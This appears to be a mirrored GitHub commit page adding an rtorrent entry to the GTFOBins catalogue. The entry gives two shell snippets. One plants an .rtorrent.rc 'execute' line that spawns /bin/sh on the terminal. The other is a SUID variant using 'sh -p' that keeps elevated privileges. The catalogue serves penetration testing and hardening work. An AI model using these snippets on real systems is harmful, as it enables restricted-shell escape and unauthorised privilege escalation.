mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add rtorrent
This commit is contained in:
commit
2a12cf1268
11
_gtfobins/rtorrent.md
Normal file
11
_gtfobins/rtorrent.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
echo "execute = /bin/sh,-c,\"/bin/sh <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
|
||||
rtorrent
|
||||
suid:
|
||||
- code: |
|
||||
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
|
||||
./rtorrent
|
||||
---
|
Loading…
Reference in New Issue
Block a user